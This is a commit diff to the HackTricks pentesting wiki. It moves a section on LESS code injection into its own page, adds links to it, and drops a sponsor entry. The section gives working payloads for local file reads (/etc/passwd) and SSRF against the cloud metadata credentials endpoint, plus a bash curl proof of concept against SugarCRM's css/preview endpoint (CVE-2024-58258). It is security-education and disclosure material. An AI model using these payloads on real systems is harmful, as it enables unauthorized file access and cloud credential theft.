change less code injection page

Author: carlospolop

src/README.md

@@ -163,21 +163,6 @@ https://www.youtube.com/watch?v=Zq2JycGDCPM
 
 ---
 
-### [Venacus](https://venacus.com/?utm_medium=link&utm_source=hacktricks&utm_campaign=spons)
-
-<figure><img src="images/venacus-logo.svg" alt="venacus logo"><figcaption></figcaption></figure>
-
-[**Venacus**](https://venacus.com/?utm_medium=link&utm_source=hacktricks&utm_campaign=spons) is a data breach (leak) search engine. \
-We provide random string search (like google) over all types of data leaks big and small --not only the big ones-- over data from multiple sources. \
-People search, AI search, organization search, API (OpenAPI) access, theHarvester integration, all features a pentester needs.\
-**HackTricks continues to be a great learning platform for us all and we're proud to be sponsoring it!**
-
-{{#ref}}
-https://venacus.com/?utm_medium=link&utm_source=hacktricks&utm_campaign=spons
-{{#endref}}
-
----
-
 ### [CyberHelmets](https://cyberhelmets.com/courses/?ref=hacktricks)
 
 <figure><img src="images/cyberhelmets-logo.png" alt="cyberhelmets logo"><figcaption></figcaption></figure>

src/SUMMARY.md

@@ -759,6 +759,7 @@
   - [JavaScript Execution XS Leak](pentesting-web/xs-search/javascript-execution-xs-leak.md)
   - [CSS Injection](pentesting-web/xs-search/css-injection/README.md)
     - [CSS Injection Code](pentesting-web/xs-search/css-injection/css-injection-code.md)
+    - [LESS Code Injection](pentesting-web/xs-search/css-injection/less-code-injection.md)
 - [Iframe Traps](pentesting-web/iframe-traps.md)
 
 # ⛈️ Cloud Security

src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md

@@ -4,69 +4,6 @@
 
 Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**
 
-## LESS Code Injection leading to SSRF & Local File Read
-
-LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
-
-When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**.  By abusing `@import (inline)` the attacker can force the server to retrieve:
-
-* Local files via the `file://` protocol (information disclosure / Local File Inclusion).
-* Remote resources on internal networks or cloud metadata services (SSRF).
-
-This technique has been seen in real-world products such as **SugarCRM ≤ 14.0.0** (`/rest/v10/css/preview` endpoint).
-
-### Exploitation
-
-1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).
-2. Close the current statement and inject new directives.  The most common primitives are:
-   * `;`  – terminates the previous declaration.
-   * `}`  – closes the previous block (if required).
-3. Use `@import (inline) '<URL>';` to read arbitrary resources.
-4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS.
-
-#### Local File Read
-
-```
-1; @import (inline) 'file:///etc/passwd';
-@import (inline) 'data:text/plain,@@END@@'; //
-```
-
-The contents of `/etc/passwd` will appear in the HTTP response just before the `@@END@@` marker.
-
-#### SSRF – Cloud Metadata
-
-```
-1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
-@import (inline) 'data:text/plain,@@END@@'; //
-```
-
-#### Automated PoC (SugarCRM example)
-
-```bash
-#!/usr/bin/env bash
-# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
-
-TARGET="$1"        # Base URL of SugarCRM instance
-RESOURCE="$2"      # file:// path or URL to fetch
-
-INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
-
-curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
-  sed -n 's/.*@@END@@\(.*\)/\1/p'
-```
-
-### Real-World Cases
-
-| Product | Vulnerable Endpoint | Impact |
-|---------|--------------------|--------|
-| SugarCRM ≤ 14.0.0 | `/rest/v10/css/preview?lm=` | Unauthenticated SSRF & local file read |
-
-### References
-
-* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
-* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
-* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
-
 {{#include ../../banners/hacktricks-training.md}}
 
 

src/pentesting-web/ssti-server-side-template-injection/README.md

@@ -1094,6 +1094,16 @@ func (p Person) Secret (test string) string {
 - [https://blog.takemyhand.xyz/2020/06/ssti-breaking-gos-template-engine-to](https://blog.takemyhand.xyz/2020/06/ssti-breaking-gos-template-engine-to)
 - [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
 
+
+### LESS (CSS Preprocessor)
+
+LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
+
+{{#ref}}
+../xs-search/css-injection/less-code-injection.md
+{{/ref}}
+
+
 ### More Exploits
 
 Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) for more exploits. Also you can find interesting tags information in [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)

src/pentesting-web/xs-search/css-injection/README.md

@@ -4,6 +4,14 @@
 
 ## CSS Injection
 
+### LESS Code Injection
+
+LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
+
+{{#ref}}
+less-code-injection.md
+{{/ref}}
+
 ### Attribute Selector
 
 CSS selectors are crafted to match values of an `input` element's `name` and `value` attributes. If the input element's value attribute starts with a specific character, a predefined external resource is loaded:

src/pentesting-web/xs-search/css-injection/less-code-injection.md

@@ -0,0 +1,62 @@
+## LESS Code Injection leading to SSRF & Local File Read
+
+LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
+
+When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**.  By abusing `@import (inline)` the attacker can force the server to retrieve:
+
+* Local files via the `file://` protocol (information disclosure / Local File Inclusion).
+* Remote resources on internal networks or cloud metadata services (SSRF).
+
+This technique has been seen in real-world products such as **SugarCRM ≤ 14.0.0** (`/rest/v10/css/preview` endpoint).
+
+### Exploitation
+
+1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).
+2. Close the current statement and inject new directives.  The most common primitives are:
+   * `;`  – terminates the previous declaration.
+   * `}`  – closes the previous block (if required).
+3. Use `@import (inline) '<URL>';` to read arbitrary resources.
+4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS.
+
+#### Local File Read
+
+```
+1; @import (inline) 'file:///etc/passwd';
+@import (inline) 'data:text/plain,@@END@@'; //
+```
+
+The contents of `/etc/passwd` will appear in the HTTP response just before the `@@END@@` marker.
+
+#### SSRF – Cloud Metadata
+
+```
+1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
+@import (inline) 'data:text/plain,@@END@@'; //
+```
+
+#### Automated PoC (SugarCRM example)
+
+```bash
+#!/usr/bin/env bash
+# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
+
+TARGET="$1"        # Base URL of SugarCRM instance
+RESOURCE="$2"      # file:// path or URL to fetch
+
+INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
+
+curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
+  sed -n 's/.*@@END@@\(.*\)/\1/p'
+```
+
+### Real-World Cases
+
+| Product | Vulnerable Endpoint | Impact |
+|---------|--------------------|--------|
+| SugarCRM ≤ 14.0.0 | `/rest/v10/css/preview?lm=` | Unauthenticated SSRF & local file read |
+
+### References
+
+* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
+* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)